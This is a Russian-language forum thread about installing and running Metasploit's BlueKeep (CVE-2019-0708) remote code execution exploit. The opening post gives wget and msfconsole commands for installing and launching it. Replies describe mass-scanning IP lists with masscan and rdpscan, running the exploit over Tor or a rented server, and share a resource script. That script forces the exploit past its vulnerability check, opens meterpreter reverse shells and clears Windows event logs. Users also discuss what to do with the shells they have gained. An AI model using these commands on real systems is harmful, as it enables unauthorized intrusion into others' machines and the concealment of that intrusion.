• 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):
Bash:
cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:
Код:
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

Код:
mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!
 
Последнее редактирование:
Например, у вас есть список из 100 адресов. Запускаете 4 метасплоита в разных окнах (или в screen). В каждом метасплоите обрабатываются 25 адресов. Когда первый метасплоит прошел все 25 адресов, у вас открылось, например, две сессии. Тогда с ними можно работать.

Я делают так: захожу на виртуальный сервер с публичным постоянным IP и оттуда запускаю метасплоит, eth0 = его публичному IP. Либо так: через tor подключаюсь к интернет, получаю публичный адрес и порты открыты (у меня локальный провайдер все порты перекрыл). Правда, так сессий меньше прилетает. Если через виртуалку, то порт должен быть открыт и в виртуалке, и в роутере, и у провайдера. Поэтому лучше это делать через удаленный сервер, где все порты открыты, какие надо, и нет зависимости от провайдера.
спасибо за совет
возможно у меня что то где то корректно не работает
 
  • Нравится
Реакции: Alois
да, я сначала через masscan
потом rdpscan

после просто grep got ips.txt =)


но пока успехов ноль)
 
Последнее редактирование:
  • Нравится
Реакции: Alois
Пробив у всего это "тракора" минимальный но и он тоже радует безусловно, у меня так же стоит открытый вопрос кто игрался со значениями vmware hyper-v ... etc, у кого какие были результаты?
 
На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background
Извините, можете мне объяснить несколько моментов?
Для чего у вас PAYLOAD windows/x64/meterpreter/reverse_tcp если по умолчанию используется generic/shell_reverse_tcp ?
Зачем в скрипте команда getsystem если сессия и так прилетает от имени системы?
 
Извините, можете мне объяснить несколько моментов?
Для чего у вас PAYLOAD windows/x64/meterpreter/reverse_tcp если по умолчанию используется generic/shell_reverse_tcp ?
Зачем в скрипте команда getsystem если сессия и так прилетает от имени системы?
Метерпретер более функционален и его советуют на многих сайтах. getsystem можно конечно убрать, это привычка с самого начала. Вы правы.

Как вариант, можно попробовать generic/shell_reverse_tcp, может быть, чаще сессия будет открываться.
 
  • Нравится
Реакции: zhe_ka
На гитхабе не знаю. Мой выглядит примерно так:

msfconsole.rc
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS file:xxx
set ForceExploit true
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST eth0
set LPORT 4444
set VERBOSE true
set AutoRunScript /root/.msf4/meterpreter.rc
set GROOMSIZE 250

meterpreter.rc
getsystem
ps
clearev
background
Подскажите , за что отвечают функции :
set ForceExploit true
set VERBOSE true
 
Подскажите , за что отвечают функции :
set ForceExploit true
set VERBOSE true
VERBOSE true дает больше информации о ходе взлома.
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override. Это нужно, чтобы эксплоит работал, а не прекращался с ошибкой.
 
VERBOSE true дает больше информации о ходе взлома.
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override. Это нужно, чтобы эксплоит работал, а не прекращался с ошибкой.
Подскажите , сессия поднимается . Shell coздаёться. А что делать дальше , я не знаю ))))))
30334488.png
 
Подскажите , сессия поднимается . Shell coздаёться. А что делать дальше , я не знаю ))))))Посмотреть вложение 40893
set payload windows/x64/meterpreter/reverse_tcp
Попробуйте вот этот пейлоуд. Если сессия откроется, то вы попадете в
meterpreter, там введите help. Если сессия в фоне, то sessions -i номер сессии. Его узнаете через команду sessions.
В Armitage у вас компьютер будет выделен другим цветом, если он реально будет взломан.
 
set payload windows/x64/meterpreter/reverse_tcp
Попробуйте вот этот пейлоуд. Если сессия откроется, то вы попадете в
meterpreter, там введите help. Если сессия в фоне, то sessions -i номер сессии. Его узнаете через команду sessions.
Я пишу sessions -i номер сессии . Он мне пишет что сессия открыта с пейлоадом. И на этом всё. Что дальше мне делать ХЗ.(((
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD